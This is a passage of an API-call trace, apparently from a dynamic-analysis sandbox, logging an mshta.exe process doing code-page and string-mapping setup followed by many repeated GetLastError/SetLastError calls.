GetLastError () returned 0x0 [0107.877] SetLastError (dwErrCode=0x0) [0107.877] GetACP () returned 0x4e4 [0107.877] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x220) returned 0x7213e8 [0107.877] GetLastError () returned 0x0 [0107.878] SetLastError (dwErrCode=0x0) [0107.878] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f69c | out: lpCPInfo=0x22f69c) returned 1 [0107.878] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f168 | out: lpCPInfo=0x22f168) returned 1 [0107.878] GetLastError () returned 0x0 [0107.878] SetLastError (dwErrCode=0x0) [0107.878] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x22f0f8 | out: lpCharType=0x22f0f8) returned 1 [0107.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f57c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f57c, cbMultiByte=256, lpWideCharStr=0x22eee8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏áĀ") returned 256 [0107.878] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏áĀ", cchSrc=256, lpCharType=0x22f17c | out: lpCharType=0x22f17c) returned 1 [0107.878] GetLastError () returned 0x0 [0107.878] SetLastError (dwErrCode=0x0) [0107.878] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0107.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f57c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f57c, cbMultiByte=256, lpWideCharStr=0x22ee88, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ嗡惔Ā") returned 256 [0107.878] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ嗡惔Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0107.878] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ嗡惔Ā", cchSrc=256, lpDestStr=0x22ec78, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0107.878] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x22f47c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿµSÔ`´ö\"", lpUsedDefaultChar=0x0) returned 256 [0107.878] GetLastError () returned 0x0 [0107.879] SetLastError (dwErrCode=0x0) [0107.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f57c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f57c, cbMultiByte=256, lpWideCharStr=0x22eea8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ嗁惔Ā") returned 256 [0107.879] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ嗁惔Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0107.879] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ嗁惔Ā", cchSrc=256, lpDestStr=0x22ec98, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0107.879] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x22f37c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿµSÔ`´ö\"", lpUsedDefaultChar=0x0) returned 256 [0107.879] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xe1b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0107.879] GetLastError () returned 0x0 [0107.879] SetLastError (dwErrCode=0x0) [0107.879] GetLastError () returned 0x0 [0107.879] SetLastError (dwErrCode=0x0) [0107.879] GetLastError () returned 0x0 [0107.879] SetLastError (dwErrCode=0x0) [0107.879] GetLastError () returned 0x0 [0107.880] SetLastError (dwErrCode=0x0) [0107.880] GetLastError () returned 0x0 [0107.880] SetLastError (dwErrCode=0x0) [0107.880] GetLastError () returned 0x0 [0107.880] SetLastError (dwErrCode=0x0) [0107.880] GetLastError () returned 0x0 [0107.880] SetLastError (dwErrCode=0x0) [0107.880] GetLastError () returned 0x0 [0107.880] SetLastError (dwErrCode=0x0) [0107.880] GetLastError () returned 0x0 [0107.880] SetLastError (dwErrCode=0x0) [0107.880] GetLastError () returned 0x0 [0107.881] SetLastError (dwErrCode=0x0) [0107.881] GetLastError () returned 0x0 [0107.881] SetLastError (dwErrCode=0x0) [0107.881] GetLastError () returned 0x0 [0107.881] SetLastError (dwErrCode=0x0) [0107.881] GetLastError () returned 0x0 [0107.881] SetLastError (dwErrCode=0x0) [0107.881] GetLastError () returned 0x0 [0107.881] SetLastError (dwErrCode=0x0) [0107.881] GetLastError () returned 0x0 [0107.881] SetLastError (dwErrCode=0x0) [0107.881] GetLastError () returned 0x0 [0107.881] SetLastError (dwErrCode=0x0) [0107.881] GetLastError () returned 0x0 [0107.882] SetLastError (dwErrCode=0x0) [0107.882] GetLastError () returned 0x0 [0107.882] SetLastError (dwErrCode=0x0) [0107.882] GetLastError () returned 0x0 [0107.882] SetLastError (dwErrCode=0x0) [0107.882] GetLastError () returned 0x0 [0107.882] SetLastError (dwErrCode=0x0) [0107.882] GetLastError () returned 0x0 [0107.882] SetLastError (dwErrCode=0x0) [0107.882] GetLastError () returned 0x0 [0107.882] SetLastError (dwErrCode=0x0) [0107.882] GetLastError () returned 0x0 [0107.882] SetLastError (dwErrCode=0x0) [0107.882] GetLastError () returned 0x0 [0107.883] SetLastError (dwErrCode=0x0) [0107.883] GetLastError () returned 0x0 [0107.883] SetLastError (dwErrCode=0x0) [0107.883] GetLastError () returned 0x0 [0107.883] SetLastError (dwErrCode=0x0) [0107.883] GetLastError () returned 0x0 [0107.883] SetLastError (dwErrCode=0x0) [0107.883] GetLastError () returned 0x0 [0107.883] SetLastError (dwErrCode=0x0) [0107.883] GetLastError () returned 0x0 [0107.883] SetLastError (dwErrCode=0x0) [0107.883] GetLastError () returned 0x0 [0107.883] SetLastError (dwErrCode=0x0) [0107.884] GetLastError () returned 0x0 [0107.884] SetLastError (dwErrCode=0x0) [0107.884] GetLastError () returned 0x0 [0107.884] SetLastError (dwErrCode=0x0) [0107.884] GetLastError () returned 0x0 [0107.884] SetLastError (dwErrCode=0x0) [0107.884] GetLastError () returned 0x0 [0107.884] SetLastError (dwErrCode=0x0) [0107.884] GetLastError () returned 0x0 [0107.884] SetLastError (dwErrCode=0x0) [0107.884] GetLastError () returned 0x0 [0107.884] SetLastError (dwErrCode=0x0) [0107.884] GetLastError () returned 0x0 [0107.884] SetLastError (dwErrCode=0x0) [0107.885] GetLastError () returned 0x0 [0107.885] SetLastError (dwErrCode=0x0) [0107.885] GetLastError () returned 0x0 [0107.885] SetLastError (dwErrCode=0x0) [0107.885] GetLastError () returned 0x0 [0107.885] SetLastError (dwErrCode=0x0) [0107.885] GetLastError () returned 0x0 [0107.885] SetLastError (dwErrCode=0x0) [0107.885] GetLastError () returned 0x0 [0107.885] SetLastError (dwErrCode=0x0) [0107.885] GetLastError () returned 0x0 [0107.885] SetLastError (dwErrCode=0x0) [0107.885] GetLastError () returned 0x0 [0107.885] SetLastError (dwErrCode=0x0) [0107.885] GetLastError () returned 0x0 [0107.886] SetLastError (dwErrCode=0x0) [0107.886] GetLastError () returned 0x0 [0107.886] SetLastError (dwErrCode=0x0) [0107.886] GetLastError () returned 0x0 [0107.886] SetLastError (dwErrCode=0x0) [0107.886] GetLastError () returned 0x0 [0107.886] SetLastError (dwErrCode=0x0) [0107.886] GetLastError () returned 0x0 [0107.886] SetLastError (dwErrCode=0x0) [0107.886] GetLastError () returned 0x0 [0107.886] SetLastError (dwErrCode=0x0) [0107.886] GetLastError () returned 0x0 [0107.886] SetLastError (dwErrCode=0x0) [0107.886] GetLastError () returned 0x0 [0107.887] SetLastError (dwErrCode=0x0) [0107.887] GetLastError () returned 0x0 [0107.887] SetLastError (dwErrCode=0x0) [0107.887] GetLastError () returned 0x0 [0107.887] SetLastError (dwErrCode=0x0) [0107.887] GetLastError () returned 0x0 [0107.887] SetLastError (dwErrCode=0x0) [0107.887] GetLastError () returned 0x0 [0107.887] SetLastError (dwErrCode=0x0) [0107.887] GetLastError () returned 0x0 [0107.887] SetLastError (dwErrCode=0x0) [0107.887] GetLastError () returned 0x0 [0107.887] SetLastError (dwErrCode=0x0) [0107.887] GetLastError () returned 0x0 [0107.887] SetLastError (dwErrCode=0x0) [0107.887] GetLastError () returned 0x0 [0107.887] SetLastError (dwErrCode=0x0) [0107.887] GetLastError () returned 0x0 [0107.888] SetLastError (dwErrCode=0x0) [0107.888] GetLastError () returned 0x0 [0107.888] SetLastError (dwErrCode=0x0) [0107.888] GetLastError () returned 0x0 [0107.888] SetLastError (dwErrCode=0x0) [0107.888] GetLastError () returned 0x0 [0107.888] SetLastError (dwErrCode=0x0) [0107.888] GetLastError () returned 0x0 [0107.888] SetLastError (dwErrCode=0x0) [0107.888] GetLastError () returned 0x0 [0107.888] SetLastError (dwErrCode=0x0) [0107.888] GetLastError () returned 0x0 [0107.888] SetLastError (dwErrCode=0x0) [0107.888] GetLastError () returned 0x0 [0107.888] SetLastError (dwErrCode=0x0) [0107.888] GetLastError () returned 0x0 [0107.888] SetLastError (dwErrCode=0x0) [0107.888] GetLastError () returned 0x0 [0107.888] SetLastError (dwErrCode=0x0) [0107.888] GetLastError () returned 0x0 [0107.889] SetLastError (dwErrCode=0x0) [0107.889] GetLastError () returned 0x0 [0107.889] SetLastError (dwErrCode=0x0) [0107.889] GetLastError () returned 0x0 [0107.889] SetLastError (dwErrCode=0x0) [0107.889] GetLastError () returned 0x0 [0107.889] SetLastError (dwErrCode=0x0) [0107.889] GetLastError () returned 0x0 [0107.889] SetLastError (dwErrCode=0x0) [0107.889] GetLastError () returned 0x0 [0107.889] SetLastError (dwErrCode=0x0) [0107.889] GetLastError () returned 0x0 [0107.889] SetLastError (dwErrCode=0x0) [0107.889] GetLastError () returned 0x0 [0107.890] SetLastError (dwErrCode=0x0) [0107.890] GetLastError () returned 0x0 [0107.890] SetLastError (dwErrCode=0x0) [0107.890] GetLastError () returned 0x0 [0107.890] SetLastError (dwErrCode=0x0) [0107.890] GetLastError () returned 0x0 [0107.890] SetLastError (dwErrCode=0x0) [0107.890] GetLastError () returned 0x0 [0107.890] SetLastError (dwErrCode=0x0) [0107.890] GetLastError () returned 0x0 [0107.890] SetLastError (dwErrCode=0x0) [0107.890] GetLastError () returned 0x0 [0107.890] SetLastError (dwErrCode=0x0) [0107.890] GetLastError () returned 0x0 [0107.890] SetLastError (dwErrCode=0x0) [0107.891] GetLastError () returned 0x0 [0107.891] SetLastError (dwErrCode=0x0) [0107.891] GetLastError () returned 0x0 [0107.891] SetLastError (dwErrCode=0x0) [0107.891] GetLastError () returned 0x0 [0107.891] SetLastError (dwErrCode=0x0) [0107.891] GetLastError () returned 0x0 [0107.891] SetLastError (dwErrCode=0x0) [0107.891] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x188) returned 0x721610 [0107.891] GetLastError () returned 0x0 [0107.891] SetLastError (dwErrCode=0x0) [0107.891] GetLastError () returned 0x0 [0107.891] SetLastError (dwErrCode=0x0) [0107.891] GetLastError () returned 0x0 [0107.892] SetLastError (dwErrCode=0x0) [0107.892] GetLastError () returned 0x0 [0107.892] SetLastError (dwErrCode=0x0) [0107.892] GetLastError () returned 0x0 [0107.892] SetLastError (dwErrCode=0x0) [0107.892] GetLastError () returned 0x0 [0107.892] SetLastError (dwErrCode=0x0) [0107.892] GetLastError () returned 0x0 [0107.892] SetLastError (dwErrCode=0x0) [0107.892] GetLastError () returned 0x0 [0107.893] SetLastError (dwErrCode=0x0) [0107.893] GetLastError () returned 0x0 [0107.893] SetLastError (dwErrCode=0x0) [0107.893] GetLastError () returned 0x0 [0107.893] SetLastError (dwErrCode=0x0) [0107.893] GetLastError () returned 0x0 [0107.893] SetLastError (dwErrCode=0x0) [0107.893] GetLastError () returned 0x0 [0107.893] SetLastError (dwErrCode=0x0) [0107.893] GetLastError () returned 0x0 [0107.894] SetLastError (dwErrCode=0x0) [0107.894] GetLastError () returned 0x0 [0107.894] SetLastError (dwErrCode=0x0) [0107.894] GetLastError () returned 0x0 [0107.894] SetLastError (dwErrCode=0x0) [0107.894] GetLastError () returned 0x0 [0107.894] SetLastError (dwErrCode=0x0) [0107.894] GetLastError () returned 0x0 [0107.894] SetLastError (dwErrCode=0x0) [0107.894] GetLastError () returned 0x0 [0107.894] SetLastError (dwErrCode=0x0) [0107.894] GetLastError () returned 0x0 [0107.894] SetLastError (dwErrCode=0x0) [0107.894] GetLastError () returned 0x0 [0107.895] SetLastError (dwErrCode=0x0) [0107.895] GetLastError () returned 0x0 [0107.895] SetLastError (dwErrCode=0x0) [0107.895] GetLastError () returned 0x0 [0107.895] SetLastError (dwErrCode=0x0) [0107.895] GetLastError () returned 0x0 [0107.895] SetLastError (dwErrCode=0x0) [0107.895] GetLastError () returned 0x0 [0107.895] SetLastError (dwErrCode=0x0) [0107.895] GetLastError () returned 0x0 [0107.895] SetLastError (dwErrCode=0x0) [0107.895] GetLastError () returned 0x0 [0107.895] SetLastError (dwErrCode=0x0) [0107.895] GetLastError () returned 0x0 [0107.896] SetLastError (dwErrCode=0x0) [0107.896] GetLastError () returned 0x0 [0107.896] SetLastError (dwErrCode=0x0) [0107.896] GetLastError () returned 0x0 [0107.896] SetLastError (dwErrCode=0x0) [0107.896] GetLastError () returned 0x0 [0107.896] SetLastError (dwErrCode=0x0) [0107.896] GetLastError () returned 0x0 [0107.896] SetLastError (dwErrCode=0x0) [0107.896] GetLastError () returned 0x0 [0107.896] SetLastError (dwErrCode=0x0) [0107.896] GetLastError () returned 0x0 [0107.896] SetLastError (dwErrCode=0x0) [0107.896] GetLastError () returned 0x0 [0107.897] SetLastError (dwErrCode=0x0) [0107.897] GetLastError () returned 0x0 [0107.897] SetLastError (dwErrCode=0x0) [0107.897] GetLastError () returned 0x0 [0107.897] SetLastError (dwErrCode=0x0) [0107.897] GetLastError () returned 0x0 [0107.897] SetLastError (dwErrCode=0x0) [0107.897] GetLastError () returned 0x0 [0107.897] SetLastError (dwErrCode=0x0) [0107.897] GetLastError () returned 0x0 [0107.897] SetLastError (dwErrCode=0x0) [0107.897] GetLastError () returned 0x0 [0107.897] SetLastError (dwErrCode=0x0) [0107.897] GetLastError () returned 0x0 [0107.898] SetLastError (dwErrCode=0x0) [0107.898] GetLastError () returned 0x0 [0107.898] SetLastError (dwErrCode=0x0) [0107.898] GetLastError () returned 0x0 [0107.898] SetLastError (dwErrCode=0x0) [0107.898] GetLastError () returned 0x0 [0107.898] SetLastError (dwErrCode=0x0) [0107.898] GetLastError () returned 0x0 [0107.898] SetLastError (dwErrCode=0x0) [0107.898] GetLastError () returned 0x0 [0107.898] SetLastError (dwErrCode=0x0) [0107.898] GetLastError () returned 0x0 [0107.899] SetLastError (dwErrCode=0x0) [0107.899] GetLastError () returned 0x0 [0107.899] SetLastError (dwErrCode=0x0) [0107.899] GetLastError () returned 0x0 [0107.899] SetLastError (dwErrCode=0x0) [0107.899] GetLastError () returned 0x0 [0107.899] SetLastError 